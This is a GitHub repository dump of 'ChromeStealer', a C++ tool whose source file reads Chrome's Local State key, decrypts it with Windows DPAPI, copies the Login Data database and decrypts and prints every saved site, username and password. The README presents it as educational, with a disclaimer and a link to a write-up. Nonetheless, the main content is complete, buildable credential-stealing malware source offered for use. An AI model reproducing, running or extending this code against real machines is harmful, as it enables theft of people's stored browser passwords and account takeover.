Repository: BernKing/ChromeStealer Branch: master Commit: 951ed59fe478 Files: 9 Total size: 35.9 KB Directory structure: gitextract_foglabb_/ ├── .gitattributes ├── .gitignore ├── ChromeStealer.cpp ├── ChromeStealer.h ├── ChromeStealer.sln ├── ChromeStealer.vcxproj ├── ChromeStealer.vcxproj.filters ├── LICENSE └── README.md ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ ############################################################################### # Set default behavior to automatically normalize line endings. ############################################################################### * text=auto ############################################################################### # Set default behavior for command prompt diff. # # This is need for earlier builds of msysgit that does not have it on by # default for csharp files. # Note: This is only used by command line ############################################################################### #*.cs diff=csharp ############################################################################### # Set the merge driver for project and solution files # # Merging from the command prompt will add diff markers to the files if there # are conflicts (Merging from VS is not affected by the settings below, in VS # the diff markers are never inserted). Diff markers may cause the following # file extensions to fail to load in VS. An alternative would be to treat # these files as binary and thus will always conflict and require user # intervention with every merge. To do so, just uncomment the entries below ############################################################################### #*.sln merge=binary #*.csproj merge=binary #*.vbproj merge=binary #*.vcxproj merge=binary #*.vcproj merge=binary #*.dbproj merge=binary #*.fsproj merge=binary #*.lsproj merge=binary #*.wixproj merge=binary #*.modelproj merge=binary #*.sqlproj merge=binary #*.wwaproj merge=binary ############################################################################### # behavior for image files # # image files are treated as binary by default. ############################################################################### #*.jpg binary #*.png binary #*.gif binary ############################################################################### # diff behavior for common document formats # # Convert binary document formats to text before diffing them. This feature # is only available from the command line. Turn it on by uncommenting the # entries below. ############################################################################### #*.doc diff=astextplain #*.DOC diff=astextplain #*.docx diff=astextplain #*.DOCX diff=astextplain #*.dot diff=astextplain #*.DOT diff=astextplain #*.pdf diff=astextplain #*.PDF diff=astextplain #*.rtf diff=astextplain #*.RTF diff=astextplain ================================================ FILE: .gitignore ================================================ ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. ## ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore # User-specific files *.rsuser *.suo *.user *.userosscache *.sln.docstates # User-specific files (MonoDevelop/Xamarin Studio) *.userprefs # Mono auto generated files mono_crash.* # Build results [Dd]ebug/ [Dd]ebugPublic/ [Rr]elease/ [Rr]eleases/ x64/ x86/ [Ww][Ii][Nn]32/ [Aa][Rr][Mm]/ [Aa][Rr][Mm]64/ bld/ [Bb]in/ [Oo]bj/ [Ll]og/ [Ll]ogs/ # Visual Studio 2015/2017 cache/options directory .vs/ # Uncomment if you have tasks that create the project's static files in wwwroot #wwwroot/ # Visual Studio 2017 auto generated files Generated\ Files/ # MSTest test Results [Tt]est[Rr]esult*/ [Bb]uild[Ll]og.* # NUnit *.VisualState.xml TestResult.xml nunit-*.xml # Build Results of an ATL Project [Dd]ebugPS/ [Rr]eleasePS/ dlldata.c # Benchmark Results BenchmarkDotNet.Artifacts/ # .NET Core project.lock.json project.fragment.lock.json artifacts/ # ASP.NET Scaffolding ScaffoldingReadMe.txt # StyleCop StyleCopReport.xml # Files built by Visual Studio *_i.c *_p.c *_h.h *.ilk *.meta *.obj *.iobj *.pch *.pdb *.ipdb *.pgc *.pgd *.rsp *.sbr *.tlb *.tli *.tlh *.tmp *.tmp_proj *_wpftmp.csproj *.log *.tlog *.vspscc *.vssscc .builds *.pidb *.svclog *.scc # Chutzpah Test files _Chutzpah* # Visual C++ cache files ipch/ *.aps *.ncb *.opendb *.opensdf *.sdf *.cachefile *.VC.db *.VC.VC.opendb # Visual Studio profiler *.psess *.vsp *.vspx *.sap # Visual Studio Trace Files *.e2e # TFS 2012 Local Workspace $tf/ # Guidance Automation Toolkit *.gpState # ReSharper is a .NET coding add-in _ReSharper*/ *.[Rr]e[Ss]harper *.DotSettings.user # TeamCity is a build add-in _TeamCity* # DotCover is a Code Coverage Tool *.dotCover # AxoCover is a Code Coverage Tool .axoCover/* !.axoCover/settings.json # Coverlet is a free, cross platform Code Coverage Tool coverage*.json coverage*.xml coverage*.info # Visual Studio code coverage results *.coverage *.coveragexml # NCrunch _NCrunch_* .*crunch*.local.xml nCrunchTemp_* # MightyMoose *.mm.* AutoTest.Net/ # Web workbench (sass) .sass-cache/ # Installshield output folder [Ee]xpress/ # DocProject is a documentation generator add-in DocProject/buildhelp/ DocProject/Help/*.HxT DocProject/Help/*.HxC DocProject/Help/*.hhc DocProject/Help/*.hhk DocProject/Help/*.hhp DocProject/Help/Html2 DocProject/Help/html # Click-Once directory publish/ # Publish Web Output *.[Pp]ublish.xml *.azurePubxml # Note: Comment the next line if you want to checkin your web deploy settings, # but database connection strings (with potential passwords) will be unencrypted *.pubxml *.publishproj # Microsoft Azure Web App publish settings. Comment the next line if you want to # checkin your Azure Web App publish settings, but sensitive information contained # in these scripts will be unencrypted PublishScripts/ # NuGet Packages *.nupkg # NuGet Symbol Packages *.snupkg # The packages folder can be ignored because of Package Restore **/[Pp]ackages/* # except build/, which is used as an MSBuild target. !**/[Pp]ackages/build/ # Uncomment if necessary however generally it will be regenerated when needed #!**/[Pp]ackages/repositories.config # NuGet v3's project.json files produces more ignorable files *.nuget.props *.nuget.targets # Microsoft Azure Build Output csx/ *.build.csdef # Microsoft Azure Emulator ecf/ rcf/ # Windows Store app package directories and files AppPackages/ BundleArtifacts/ Package.StoreAssociation.xml _pkginfo.txt *.appx *.appxbundle *.appxupload # Visual Studio cache files # files ending in .cache can be ignored *.[Cc]ache # but keep track of directories ending in .cache !?*.[Cc]ache/ # Others ClientBin/ ~$* *~ *.dbmdl *.dbproj.schemaview *.jfm *.pfx *.publishsettings orleans.codegen.cs # Including strong name files can present a security risk # (https://github.com/github/gitignore/pull/2483#issue-259490424) #*.snk # Since there are multiple workflows, uncomment next line to ignore bower_components # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) #bower_components/ # RIA/Silverlight projects Generated_Code/ # Backup & report files from converting an old project file # to a newer Visual Studio version. Backup files are not needed, # because we have git ;-) _UpgradeReport_Files/ Backup*/ UpgradeLog*.XML UpgradeLog*.htm ServiceFabricBackup/ *.rptproj.bak # SQL Server files *.mdf *.ldf *.ndf # Business Intelligence projects *.rdl.data *.bim.layout *.bim_*.settings *.rptproj.rsuser *- [Bb]ackup.rdl *- [Bb]ackup ([0-9]).rdl *- [Bb]ackup ([0-9][0-9]).rdl # Microsoft Fakes FakesAssemblies/ # GhostDoc plugin setting file *.GhostDoc.xml # Node.js Tools for Visual Studio .ntvs_analysis.dat node_modules/ # Visual Studio 6 build log *.plg # Visual Studio 6 workspace options file *.opt # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) *.vbw # Visual Studio 6 auto-generated project file (contains which files were open etc.) *.vbp # Visual Studio 6 workspace and project file (working project files containing files to include in project) *.dsw *.dsp # Visual Studio 6 technical files *.ncb *.aps # Visual Studio LightSwitch build output **/*.HTMLClient/GeneratedArtifacts **/*.DesktopClient/GeneratedArtifacts **/*.DesktopClient/ModelManifest.xml **/*.Server/GeneratedArtifacts **/*.Server/ModelManifest.xml _Pvt_Extensions # Paket dependency manager .paket/paket.exe paket-files/ # FAKE - F# Make .fake/ # CodeRush personal settings .cr/personal # Python Tools for Visual Studio (PTVS) __pycache__/ *.pyc # Cake - Uncomment if you are using it # tools/** # !tools/packages.config # Tabs Studio *.tss # Telerik's JustMock configuration file *.jmconfig # BizTalk build output *.btp.cs *.btm.cs *.odx.cs *.xsd.cs # OpenCover UI analysis results OpenCover/ # Azure Stream Analytics local run output ASALocalRun/ # MSBuild Binary and Structured Log *.binlog # NVidia Nsight GPU debugger configuration file *.nvuser # MFractors (Xamarin productivity tool) working folder .mfractor/ # Local History for Visual Studio .localhistory/ # Visual Studio History (VSHistory) files .vshistory/ # BeatPulse healthcheck temp database healthchecksdb # Backup folder for Package Reference Convert tool in Visual Studio 2017 MigrationBackup/ # Ionide (cross platform F# VS Code tools) working folder .ionide/ # Fody - auto-generated XML schema FodyWeavers.xsd # VS Code files for those working on multiple tools .vscode/* !.vscode/settings.json !.vscode/tasks.json !.vscode/launch.json !.vscode/extensions.json *.code-workspace # Local History for Visual Studio Code .history/ # Windows Installer files from build outputs *.cab *.msi *.msix *.msm *.msp # JetBrains Rider *.sln.iml ================================================ FILE: ChromeStealer.cpp ================================================ #include "ChromeStealer.h" //Check if WIndows system #ifdef _WIN32 // Checks if Google Chrome is installed on the machine. // This function queries the Windows Registry to check if the registry key // for Chrome's installation path exists. // @return True if Chrome is installed, false otherwise. bool IsChromeInstalled() { HKEY hKey; // Open the registry key for Chrome's installation path. LONG lRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\chrome.exe", 0, KEY_READ, &hKey); // If the key exists, Chrome is installed. if (lRes == ERROR_SUCCESS) { RegCloseKey(hKey); return true; } else { return false; } } // Finds the path to the Local State file. // This function retrieves the user's profile path and constructs the path to // the Local State file used by Google Chrome. // @return The path to the Local State file as a wide string. std::wstring FindLocalState() { WCHAR userProfile[MAX_PATH]; HRESULT result = SHGetFolderPathW(NULL, CSIDL_PROFILE, NULL, 0, userProfile); if (!SUCCEEDED(result)) { warn("Error getting user path. Error: %ld", GetLastError()); return L""; } WCHAR localStatePath[MAX_PATH]; _snwprintf_s(localStatePath, MAX_PATH, _TRUNCATE, L"%s\\AppData\\Local\\Google\\Chrome\\User Data\\Local State", userProfile); okay("Full path to Local State file: %ls", localStatePath); return std::wstring(localStatePath); } // Finds the path to the Login Data file. // This function retrieves the user's profile path and constructs the path to // the Login Data file used by Google Chrome. // @return The path to the Login Data file as a wide string. std::wstring FindLoginData() { WCHAR userProfile[MAX_PATH]; //CSIDL_PROFILE macro for USER PROFILE HRESULT result = SHGetFolderPathW(NULL, CSIDL_PROFILE, NULL, 0, userProfile); if (!SUCCEEDED(result)) { warn("Error getting user path. Error: %ld", GetLastError()); return L""; } WCHAR loginDataPath[MAX_PATH]; _snwprintf_s(loginDataPath, MAX_PATH, L"%s\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", userProfile); okay("Full path to Login Data file: %ls", loginDataPath); return std::wstring(loginDataPath); } // Retrieves the encrypted key from the Local State file. // This function reads the Local State file in JSON format and extracts the // encrypted key used by Google Chrome. // @param localStatePath The path to the Local State file. // @return The encrypted key as a string. std::string getEncryptedKey(const std::wstring& localStatePath) { std::ifstream file(localStatePath); if (!file.is_open()) { warn("Error opening the file. Error: %ld", GetLastError()); return ""; } json localState = json::parse(file); file.close(); auto itOsEncrypt = localState.find("os_crypt"); if (itOsEncrypt == localState.end() || !itOsEncrypt.value().is_object()) { warn("Key os_crypt not found or not an object."); return ""; } okay("Key os_crypt found."); auto itEncryptedKey = itOsEncrypt.value().find("encrypted_key"); if (itEncryptedKey == itOsEncrypt.value().end()) { warn("Key encrypted_key not found or not an object"); return ""; } okay("Key encrypted_key found"); std::string encryptedKey = itEncryptedKey.value(); //okay("Value at key encrypted_key: %s", encryptedKey.c_str()); return encryptedKey; } // Decrypts an encrypted key using the CryptUnprotectData function. // This function decodes a Base64-encoded string and decrypts it to retrieve // the original key. // @param encrypted_key The encrypted key as a Base64-encoded string. // @return The decrypted key as a DATA_BLOB structure. DATA_BLOB decryptKey(const std::string& encrypted_key) { if (encrypted_key.empty()) { warn("Input string is empty."); return {}; } DWORD decodedBinarySize = 0; if (!CryptStringToBinaryA(encrypted_key.c_str(), 0, CRYPT_STRING_BASE64, NULL, &decodedBinarySize, NULL, NULL)) { warn("Error decoding Base64 string first step. Error: %ld\n", GetLastError()); return {}; } if (decodedBinarySize == 0) { warn("Decoded binary size is zero."); return {}; } std::vector decodedBinaryData(decodedBinarySize); if (!CryptStringToBinaryA(encrypted_key.c_str(), 0, CRYPT_STRING_BASE64, decodedBinaryData.data(), &decodedBinarySize, NULL, NULL)) { warn("Error decoding Base64 string second step. Error: %ld\n", GetLastError()); return {}; } if (decodedBinaryData.size() < 5) { warn("Decoded binary data size is too small.\n"); return {}; } decodedBinaryData.erase(decodedBinaryData.begin(), decodedBinaryData.begin() + 5); DATA_BLOB DataInput; DATA_BLOB DataOutput; DataInput.cbData = static_cast(decodedBinaryData.size()); DataInput.pbData = decodedBinaryData.data(); if (!CryptUnprotectData(&DataInput, NULL, NULL, NULL, NULL, 0, &DataOutput)) { warn("Error decrypting data. Error %ld", GetLastError()); LocalFree(DataOutput.pbData); return {}; } //info("The decrypted data is: %s", DataOutput.pbData); return DataOutput; } // Parses the Login Data file to extract and decrypt login credentials. // This function opens the Login Data SQLite database, executes a query to retrieve login // credentials, and decrypts the passwords using the provided decryption key. // @param loginDataPath The path to the Login Data file. // @param decryptionKey The key used to decrypt the login data. // @return An integer indicating success (0) or failure (non-zero). int loginDataParser(const std::wstring& loginDataPath, DATA_BLOB decryptionKey) { sqlite3* loginDataBase = nullptr; int openingStatus = 0; std::wstring copyLoginDataPath = loginDataPath; copyLoginDataPath.append(L"a"); if (!CopyFileW(loginDataPath.c_str(), copyLoginDataPath.c_str(), FALSE)) { warn("Error copying the file. Error: %ld", GetLastError()); return EXIT_FAILURE; } using convert_type = std::codecvt_utf8; std::wstring_convert converter; std::string string_converted_path = converter.to_bytes(copyLoginDataPath); openingStatus = sqlite3_open_v2(string_converted_path.c_str(), &loginDataBase, SQLITE_OPEN_READONLY, nullptr); if (openingStatus) { warn("Can't open database: %s", sqlite3_errmsg(loginDataBase)); sqlite3_close(loginDataBase); if (!DeleteFileW(copyLoginDataPath.c_str())) { warn("Error deleting the file. Error: %ld", GetLastError()); return EXIT_FAILURE; } return openingStatus; } const char* sql = "SELECT origin_url, username_value, password_value, blacklisted_by_user FROM logins"; sqlite3_stmt* stmt = nullptr; openingStatus = sqlite3_prepare_v2(loginDataBase, sql, -1, &stmt, nullptr); if (openingStatus != SQLITE_OK) { warn("SQL error: %s", sqlite3_errmsg(loginDataBase)); sqlite3_close(loginDataBase); if (!DeleteFileW(copyLoginDataPath.c_str())) { warn("Error deleting the file. Error: %ld", GetLastError()); return EXIT_FAILURE; } return openingStatus; } okay("Executed SQL Query."); while ((openingStatus = sqlite3_step(stmt)) == SQLITE_ROW) { const unsigned char* originUrl = sqlite3_column_text(stmt, 0); const unsigned char* usernameValue = sqlite3_column_text(stmt, 1); const void* passwordBlob = sqlite3_column_blob(stmt, 2); int passwordSize = sqlite3_column_bytes(stmt, 2); int blacklistedByUser = sqlite3_column_int(stmt, 3); if (originUrl != NULL && originUrl[0] != '\0' && usernameValue != NULL && usernameValue[0] != '\0' && passwordBlob != NULL && blacklistedByUser != 1) { unsigned char iv[IV_SIZE]; if (passwordSize >= (IV_SIZE + 3)) { memcpy(iv, (unsigned char*)passwordBlob + 3, IV_SIZE); } else { warn("Password size too small to generate IV"); continue; } if (passwordSize <= (IV_SIZE + 3)) { warn("Password size too small"); continue; } BYTE* Password = (BYTE*)malloc(passwordSize - (IV_SIZE + 3)); if (Password == NULL) { warn("Memory allocation failed"); continue; } memcpy(Password, (unsigned char*)passwordBlob + (IV_SIZE + 3), passwordSize - (IV_SIZE + 3)); unsigned char decrypted[1024]; decryptPassword(Password, passwordSize - (IV_SIZE + 3), decryptionKey.pbData, iv, decrypted); decrypted[passwordSize - (IV_SIZE + 3)] = '\0'; okay("Origin URL: %s", originUrl); okay("Username Value: %s", usernameValue); okay("Password: %s", decrypted); free(Password); info("----------------------------------"); } } if (openingStatus != SQLITE_DONE) { warn("SQL error or end of data: %s", sqlite3_errmsg(loginDataBase)); } sqlite3_finalize(stmt); sqlite3_close(loginDataBase); if (!DeleteFileW(copyLoginDataPath.c_str())) { warn("Error deleting the file. Error: %ld", GetLastError()); return EXIT_FAILURE; } return EXIT_SUCCESS; } // Decrypts a password using the provided key and initialization vector (IV). // This function uses the libsodium library to decrypt the ciphertext. // @param ciphertext The encrypted password. // @param ciphertext_len The length of the encrypted password. // @param key The key used for decryption. // @param iv The initialization vector used for decryption. // @param decrypted The buffer to store the decrypted password. void decryptPassword(unsigned char* ciphertext, size_t ciphertext_len, unsigned char* key, unsigned char* iv, unsigned char* decrypted) { unsigned long long decrypted_len; if (sodium_init() < 0) { fprintf(stderr, "Failed to initialize libsodium\n"); return; } int result = crypto_aead_aes256gcm_decrypt( decrypted, &decrypted_len, NULL, ciphertext, ciphertext_len, NULL, 0, iv, key ); if (result != 0) { fprintf(stderr, "Decryption failed\n"); } else { decrypted[decrypted_len] = '\0'; } } void displayMenu() { printf("Menu:\n"); printf("1. Proceed with decryption\n"); printf("2. Quit\n"); printf("Enter your choice: "); } int main() { #ifdef _WIN32 printf(YELLOW // Set text color to purple "________________________________________________________________________________________\n" "_________ .__ _________ __ .__ \n" "\\_ ___ \\| |_________ ____ _____ ____ / _____// |_ ____ _____ | | ___________\n" "/ \\ \\/| | \\_ __ \\/ _ \\ / \\_/ __ \\ \\_____ \\\\ __\\/ __ \\\\__ \\ | | _/ __ \\_ __ \\\n" "\\ \\___| Y \\ | \\( <_> ) Y Y \\ ___/ / \\| | \\ ___/ / __ \\| |_\\ ___/| | \\/\n" " \\______ /___| /__| \\____/|__|_| /\\___ > /_______ /|__| \\___ >____ /____/\\___ >__| \n" " \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \n" "________________________________________________________________________________________\n" RESET // Reset text color "\n" " Made by Bernking\n" " For educational purposes only\n" " Check my GitHub: https://github.com/BernKing\n" " Check my blog: https://bernking.github.io/\n" ); printf("\n\n"); int choice = 0; displayMenu(); scanf_s("%d", &choice); switch (choice) { case 1: if (IsChromeInstalled()) { okay("Google Chrome is installed."); std::wstring localStatePath = FindLocalState(); std::wstring loginDataPath = FindLoginData(); std::string encryptedKey = getEncryptedKey(localStatePath); DATA_BLOB decryptionKey = decryptKey(encryptedKey); int parser = loginDataParser(loginDataPath, decryptionKey); LocalFree(decryptionKey.pbData); } else { warn("Google Chrome is not installed. Shutting down."); } break; case 2: okay("Exiting the program."); break; default: warn("Invalid choice. Exiting the program."); break; } return EXIT_SUCCESS; #else warn("This program only runs on Windows systems.\n"); return EXIT_FAILURE; #endif } #endif // _WIN32 ================================================ FILE: ChromeStealer.h ================================================ #pragma once #ifdef _WIN32 #include #include #include #include #include #include #include #include #include #include #include #include // Link against the required libraries #pragma comment(lib, "Crypt32.lib") #pragma comment(lib, "Shell32.lib") #pragma comment(lib, "Advapi32.lib") //using namespace std; using json = nlohmann::json; #define MAX_LINE_LENGTH 1024 #define IV_SIZE 12 #define EXIT_FAILURE 1 #define EXIT_SUCCESS 0 // ANSI escape codes for colors #define RESET "\033[0m" #define PURPLE "\033[35m" #define GREEN "\033[32m" #define YELLOW "\033[33m" #define okay(msg, ...) printf(GREEN "[+] " RESET msg "\n", ##__VA_ARGS__) #define warn(msg, ...) printf(PURPLE "[-] " RESET msg "\n", ##__VA_ARGS__) #define info(msg, ...) printf(YELLOW "[i] " RESET msg "\n", ##__VA_ARGS__) //Checks if Chrome is installed in the local machine. //@turn a bool stating if it is installed or not. bool IsChromeInstalled(); // Finds the path to the Local State file. // @return The path to the Local State file as a wide string. std::wstring FindLocalState(); // Finds the path to the Login Data file. // @return The path to the Login Data file as a wide string. std::wstring FindLoginData(); // Retrieves the encrypted key from the Local State file. // @param localStatePath The path to the Local State file. // @return The encrypted key as a string. std::string getEncryptedKey(const std::wstring& localStatePath); // Parses the Login Data file to extract login credentials. // @param loginDataPath The path to the Login Data file. // @param decryptionKey The key used to decrypt the login data. // @return An integer indicating success (0) or failure (non-zero). int loginDataParser(const std::wstring& loginDataPath, DATA_BLOB decryptionKey); // Decrypts an encrypted key. // @param encrypted_key The encrypted key as a string. // @return The decrypted key as a DATA_BLOB structure. DATA_BLOB decryptKey(const std::string& encrypted_key); // Decrypts a password using the provided key and initialization vector (IV). // @param ciphertext The encrypted password. // @param ciphertext_len The length of the encrypted password. // @param key The key used for decryption. // @param iv The initialization vector used for decryption. // @param decrypted The buffer to store the decrypted password. void decryptPassword(unsigned char* ciphertext, size_t ciphertext_len, unsigned char* key, unsigned char* iv, unsigned char* decrypted); #endif // _WIN32 ================================================ FILE: ChromeStealer.sln ================================================  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio Version 17 VisualStudioVersion = 17.8.34330.188 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ChromeStealer", "ChromeStealer.vcxproj", "{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 Debug|x86 = Debug|x86 Release|x64 = Release|x64 Release|x86 = Release|x86 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Debug|x64.ActiveCfg = Debug|x64 {C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Debug|x64.Build.0 = Debug|x64 {C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Debug|x86.ActiveCfg = Debug|Win32 {C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Debug|x86.Build.0 = Debug|Win32 {C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Release|x64.ActiveCfg = Release|x64 {C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Release|x64.Build.0 = Release|x64 {C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Release|x86.ActiveCfg = Release|Win32 {C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection GlobalSection(ExtensibilityGlobals) = postSolution SolutionGuid = {9B2B5CA5-4922-42FF-A48F-A44EEDB866EE} EndGlobalSection EndGlobal ================================================ FILE: ChromeStealer.vcxproj ================================================ Debug Win32 Release Win32 Debug x64 Release x64 17.0 Win32Proj {c7c8b6fb-4e59-494e-aeeb-40cf342a7e88} ChromeStealer 10.0 Application true v143 Unicode Application false v143 true Unicode Application true v143 Unicode Application false v143 true Unicode Level3 true WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) true Console true Level3 true true true WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true Console true true true Level3 true _DEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreadedDebug Console true Level3 true true true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true Console true true true ================================================ FILE: ChromeStealer.vcxproj.filters ================================================  {4FC737F1-C7A5-4376-A066-2A32D752A2FF} cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx {93995380-89BD-4b04-88EB-625FBE52EBFB} h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms Source Files Header Files ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2024 BernKing Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================

ChromeStealer


ChromeStealer is a tool for educational purposes to demonstrate how to extract and decrypt stored passwords from Google Chrome on a Windows system using C/C++.
Created by @bernKing20.


## Overview ChromeStealer was created because existing write-ups and C/C++ versions either didn't work or didn't satisfy me enough. I hope that the write-up helps other people who were in the same position as me. ## Dependencies This project uses the following libraries: 1. [libsodium](https://libsodium.gitbook.io/doc/) 2. [nlohmann/json](https://github.com/nlohmann/json) 3. [sqlite3](https://www.sqlite.org/index.html) ## Installation This project uses [vcpkg](https://vcpkg.io/) to manage dependencies. Ensure you have vcpkg installed and integrated with Visual Studio 2022. 1. Clone the repository: ```sh git clone https://github.com/BernKing/ChromeStealer.git cd ChromeStealer ``` 2. Install the dependencies using vcpkg: ```sh vcpkg install libsodium jsoncpp sqlite3 ``` 3. Open the project in Visual Studio 2022. ## Usage 1. Build the project in Visual Studio 2022. 2. Run the executable. Follow the on-screen instructions to extract and decrypt stored passwords from Google Chrome. ## Full Write-Up For a detailed explanation of the project, visit the full write-up at [my blog](https://bernking.github.io//2024/chrome-stealer/). ## Disclaimer This tool is intended for educational purposes only. Misuse of this tool can lead to legal consequences. Always ensure you have permission before using it on any system. The author is not responsible for any misuse of this tool. ## License This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details. ## Acknowledgements - [libsodium](https://libsodium.gitbook.io/doc/) - [nlohmann/json](https://github.com/nlohmann/json) - [sqlite3](https://www.sqlite.org/index.html) - [How to Hack Chrome Password with Python](https://ohyicong.medium.com/how-to-hack-chrome-password-with-python-1bedc167be3d)